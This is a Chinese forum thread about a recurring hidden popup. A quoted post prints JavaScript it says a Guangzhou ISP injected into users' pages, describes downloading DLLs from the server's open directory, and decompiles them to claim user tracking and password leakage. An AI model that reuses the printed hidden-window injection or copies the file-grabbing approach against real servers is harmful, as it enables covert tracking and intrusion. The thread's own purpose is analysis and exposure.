高手帮忙~~~隔一下就跳出来,然后自动消失.瑞星杀也没毒..昏倒了

还是有这个啊...上网找了下,也有这样的.就是不知道怎么解决.
[广告]: 我为WIKI狂 你呢？
--------------------------------------------------------------------------------
救命啊~~

我遇到的这种情况!下面的是我在baidu搜到的~~就是没有解决的办法!
这过一会就会开个网页10秒左右又不见了~~好烦啊!!!!

前几天上来.遨游突然拦截一个弹出的对话框.我就觉得奇怪.空间里我没放弹出广告啊.
于是看了下页面地址.我靠.什么东西

http://59.42.71.245:9123/Blank.aspx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx

后来找了一些资料.看了另我心惊胆颤.NND,这叫我以后还感上网吗!!


天涯社区:

广X电信“绿色上网”的卑鄙行径大揭露！
　　
　　最近几天，我一打开浏览器(IE/Maxthon都是)，输入任何网站，就不断提示“禁止了一个弹出窗口”，机器差点都会给整死。感觉不对径，马上查看页面源代码，发现都被篡改为一下HTML内容：
　　
　　
　　--代码开始----------------------
　　<HTML><script language="JavaScript">
　　function newwin()
　　{var urlname;var win_attr;win_attr='toolbar=no,menubar=no,scrollbars=no,status=no,location=no,resizable=no,fullscreen=no,directories=no,width=1,height=1,top=5000,left=5000 ';window.open('http://59.42.71.245:9123/Blank.aspx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx','ips_win0',win_attr);
　　 }
　　</script>
　　<head><title></title><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META http-equiv="Content-Type" content="text/html;charset=gb2312"><meta http-equiv="Refresh" content="0; url=http://www.maxthon.com/"></head><body onload='newwin()'> </body></html>
　　--代码结束----------------------
　　
　　
　　注意点：
　　１、访问任何网站，都马上被改为以上脚本！
　　２、“body onload='newwin()'”这个动作，它是要打开一个没有任何样式、而且位置不可能显示的窗口（目的就是要隐藏！）；
　　３、该窗口都无一例外地指向“http://59.42.71.245:9123/Blank.aspx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx" target="_blank">http://59.42.71.245:9123/Blank.a ... 2QmcG9saWN5aWQ9MTIx”；
　　
　　终于明白为什么了。马上用纯真IP数据库查询地址“59.42.71.245”，结果是“地址： 广东省广x市 CZ88.NET”，也就是广x市。
　　
　　马上上网搜索，因为这个东西的存在，所以我安装了FireFox，它能勉强地允许我浏览网站。到google和baidu搜索“59.42.71.245:9123/Blank.aspx”，果然，中招的人很多！矛头都指向广州电信的所谓“绿色上网”。
　　
　　本人是经验丰富的开发人员，有着超过4年的.NET开发经验，一看“Blank.aspx”，马上意识到这是用ASP.NET写的Web应用。马上用FireFox浏览“http://59.42.71.245:9123/Blank.aspx" target="_blank">http://59.42.71.245:9123/Blank.aspx”，获得页面HTML源代码，如下：
　　
　　--代码开始----------------------
　　<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
　　<HTML>
　　 <HEAD>
　　 <title>Blank</title>
　　 <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
　　 <meta name="CODE_LANGUAGE" Content="C#">
　　 <meta name="vs_defaultClientScript" content="JavaScript">
　　 <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
　　 <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
　　
　　 <script language="JavaScript">
　　 function closeit()
　　 {
　　 //setTimeout("self.close()",10) //毫秒
　　 setTimeout("window.opener=null;window.close()",10);//十秒后关闭
　　 }
　　 </script>
　　 </HEAD>
　　 <body MS_POSITIONING="GridLayout" onload="javascript:closeit()">
　　 <form name="Blank" method="post" action="Blank.aspx" id="Blank">
　　<input type="hidden" name="__VIEWSTATE" value="dDwtNjU0MzcyMTk1Ozs+jPunIYP0tyLmcNLWqLTPhdY8wNc=" />
　　
　　 <FONT face="宋体"></FONT>
　　 </form>
　　 </body>
　　
　　</HTML>
　　--代码结束----------------------
　　
　　很明显，这是用C#写的。经验告诉我，可以访问“http://59.42.71.245:9123/”看看。果然，这个目录允许文件列表查看：
　　
　　--列表开始----------------------
　　59.42.71.245 - /bin/
　　
　　--------------------------------------------------------------------------------
　　
　　[To Parent Directory]
　　2005年6月20日 13:53 77824 CommonModule.dll
　　2005年6月28日 13:29 24576 localhost.dll
　　2005年6月28日 13:29 28160 localhost.pdb
　　2005年6月20日 13:53 28672 SDPSysUtility.dll
　　2005年6月20日 13:54 335872 UserAccessComponent.dll
　　--列表结束----------------------
　　
　　
　　OK，看见这些文件，我马上想到下载，很搞笑，竟然允许下载！把以下文件下载：
　　１、localhost.dll(就是blank.aspx所在的ASP.NET程序的主程序集)；
　　２、localhost.pdb(localhost.dll的调试库，没有用)；
　　３、CommonModule.dll(公用模块);
　　４、SDPSysUtility.dll(做安全和加密用的)；
　　５、UserAccessComponent.dll(这是关键！等一下大家看看广X电信的丑恶嘴脸！)；
　　
　　现在，有经验的.NET开发人员知道怎么做了吧？当然是请出Reflector(www.denisbauer.com/NETTools/)了！真是服了开发人员，很明显前端(ASP.NET)写代码的程序员水平不高，编码又不规范。。。呃，不要扯远了。最关键的是它们没有使用混淆，那我们的反编译就能达到目的了！在Reflector配合Reflector.FileDisassembler(http://www.denisbauer.com/NETTools/FileDisassembler.aspx)之下，我将这４个程序集大卸八块，把所有的源代码都反编译出来。
　　
　　先看localhost.dll的源代码：
　　１、C# 1.0写的，即VS2002；
　　２、WebForm1没有值得关注的代码；
　　３、重点在Global.cs：#41行，Application_Start(即整个应用启动的时候)，计时器启动－》#66行，TimerUp_Elapsed(计时器间隔)：在这里，我们看到它不断将你要访问的网站的信息写到temp\下面的新文件中，并且上传到FTP。
　　４、核心在ICS.IllegalUserAccess.ShareAccess.Blank中：
　　 a).看命名空间(名字)，我们明白这是用以控制非法用户访问网站的程序，从ICS这３个字母，我猜是Internet Control System的缩写，也就是互联网控制系统。
　　 b).在#34行Page_Load(Blank页面加载)，在对param(就是“ABdXNlcm5hbWU9Z3pEU0wzNzY2MTI1M0AxNjMuZ2QmcG9saWN5aWQ9MTIx”这个参数)几次运算之后，获取了你的机器外部IP(#67行)，并且将你的用户名、IP地址加密之后(#77行)，写到你本机的Cookie中(#85行)，为期10天(#86)，并且将这个Cookie信息写入服务器的文件中(刚才的第三步)。
　　
　　再看SDPSysUtility.dll的源代码：
　　１、这个代码主要是进行加密；
　　２、主要类是“SecretProcess.cs”，调用了TicketTool，使用了TripleDES加密算法；
　　３、其它OpTicket和OperAuthen都是对所谓的访问“令牌”和操作认证而实现的；
　　
　　再看CommonModule.dll的源代码：
　　１、这是公用模块；
　　２、使用了Oracle数据库；
　　３、会把用户密码发送到“openet@www.openet.com.cn”，查了一下“http://www.openet.com.cn/”这个网站，是“傲x信息技术（深圳）有限公司”，可以理解为：这个所谓的“绿色上网”的东西是这家公司开发的，至于为什么把密码发送到它们公司，呵呵，可能是这家公司操守有问题，留后门吧:)
　　
　　最后看UserAccessComponent.dll的源代码：
　　１、这是整个应用的最核心地方，里面的安全操作与Oracle数据库交互，让你大开眼界！
　　２、我最感兴趣的是:
　　 a).“BlackList.cs”：黑名单；
　　 b).“BlackListManage.cs”黑名单管理；
　　 c).“BlackUserManage.cs”：黑用户管理；
　　 d).“DefyUserManage.cs”：拒绝用户管理；
　　 e).“DoubtUser.cs”：置疑用户；
　　 f).“ExpiredUser.cs”：过期用户；
　　 g).“WhiteList.cs”：白名单(竟然还有白名单！嘿，我才应该是一些zf网站吧！)；
　　 h).“WhitePortManage.cs”：白端口管理(天！端口都控制了！)；
　　 i).“WhiteUserManage.cs”：白用户管理；
　　３、因为这个东西实在大，我就不一一分析，有兴趣的看家可以自行研究。
　　
　　
　　说明：
　　１、以上对英文代码的中文注释或者说明皆为我自己的理解和翻译的，可能跟实际情况有差异；
　　２、这里对每个敏感名词都进行了忌讳处理，如有雷同，纯属巧合！
　　３、我们公司有另外一个同事跟我的遭遇一样，开始以为是在本地对IE安装了插件进行了篡改，但找遍了注册表和硬盘都没有踪迹，用了各种木马和杀毒软件也没有找到，但有另外几个同事却没有，实在想不通它是在哪里开始进行篡改的。